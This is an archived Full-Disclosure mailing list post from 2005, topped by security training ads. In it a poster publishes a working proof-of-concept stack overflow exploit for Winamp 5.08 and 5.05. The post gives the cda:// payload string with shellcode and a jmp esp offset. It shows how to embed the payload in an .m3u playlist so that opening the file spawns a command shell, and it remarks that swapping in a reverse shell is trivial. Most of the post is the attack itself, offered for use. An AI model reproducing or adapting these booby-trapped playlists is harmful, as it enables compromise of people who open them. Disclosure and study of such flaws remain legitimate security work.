Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-Disclosure] Winamp Exploit (POC) 5.08 Stack Overflow

from [Rojodos] Network Security [Permanent Link]
Subject: [Full-Disclosure] Winamp Exploit (POC) 5.08 Stack Overflow
Date: Fri, 28 Jan 2005 13:22:55 +0100 
Hello :)

I´ve coded an exploit about this vulnerability, using the advisory "NSFOCUS 
SA2005-01 : Buffer Overflow in WinAMP in_cdda.dll CDA Device Name" as a guide. 
The advisory is very good, so it´s very easy to code the exploit.

This code:

cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHnT 
_IJJJ?å3ÿW?ìÆEøcÆEùmÆEúdÆEû.ÆEüeÆEýxÆEþe¸D?¿wP?]øSÿÐ

Should spawn a shell in a WinXP SP1 with Winamp 5.08, I have used as offset 
0x5f20546e olepro32.dll, a "jmp esp"  (nT _)

?å3ÿW?ìÆEøcÆEùmÆEúdÆEû.ÆEüeÆEýxÆEþe¸D?¿wP?]øSÿÐ is the scode in "printable" 
chars.

I wrote the scode sometime ago, in http://foro.elhacker.net Its a very very 
simple scode, with hardcoded system() call (i´m a noob, sorry xD)

I have used AAAABBBBCCCC... to see how big is the buffer, and to see where the 
ret is overflowed (in 5.08 exactly in HIII)

In Winamp 5.05 works the same code, but the ret is "IIII", so the exploit must 
have another "H":

 cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHnT 
_IJJJ?å3ÿW?ìÆEøcÆEùmÆEúdÆEû.ÆEüeÆEýxÆEþe¸D?¿wP?]øSÿÐ

Then, the exploit works fine in Winamp 5.05 and spawns a shell :)

I have only tested it in 5.08 and 5.05, but I think that its easy to "port" the 
exploit to another version.

These codes can be saved in a archive type m3u (playlist archive Winamp)

If you copy these codes in a text archive like this (Winamp 5.08):

#EXTM3U
#EXTINF:5,DJ Mike Llama - Llama Whippin' Intro
cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHnT 
_IJJJ?å3ÿW?ìÆEøcÆEùmÆEúdÆEû.ÆEüeÆEýxÆEþe¸D?¿wP?]øSÿÐ

(for example, i have used the "demo" archive, DJ Mike Llama and edit the PLAY 
LIST ENTRY)

And save as *.m3u file, if you open this (in this case, I repeat, with Winamp 
5.08), a cmd shell will appear :)

It´s trivial to change the shellcode to make a bindport, reverse shell, etc..

Sorry about my bad english, I´m spanish :)            (Spain exists :D)

Greets to http://www.elhacker.net  and http://foro.elhacker.net and all the 
people I know, especially "her" (Isthar) :)

THE REAL ELHACKER.NET! :D

Best regards. 

Rojodos

rojo2_bugtraq@yahoo.es
2005-01-28




_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-Disclosure] Winamp Exploit (POC) 5.08 Stack Overflow, Rojodos <=
Previous by Date:  Re: [Full-Disclosure] NAT router inbound network traffic subversion, morning_wood
Next by Date:  Re: [Full-Disclosure] NAT router inbound network traffic subversion, Joe
Previous by Thread:  [Full-Disclosure] Sify: ISP in India using hubs to provide connectivity, rohit
Next by Thread:  [Full-Disclosure] [ GLSA 200501-39 ] SquirrelMail: Multiple vulnerabilities, Sune Kloppenborg Jeppesen
Indexes:  [Date] [Thread] [Top] [All Lists]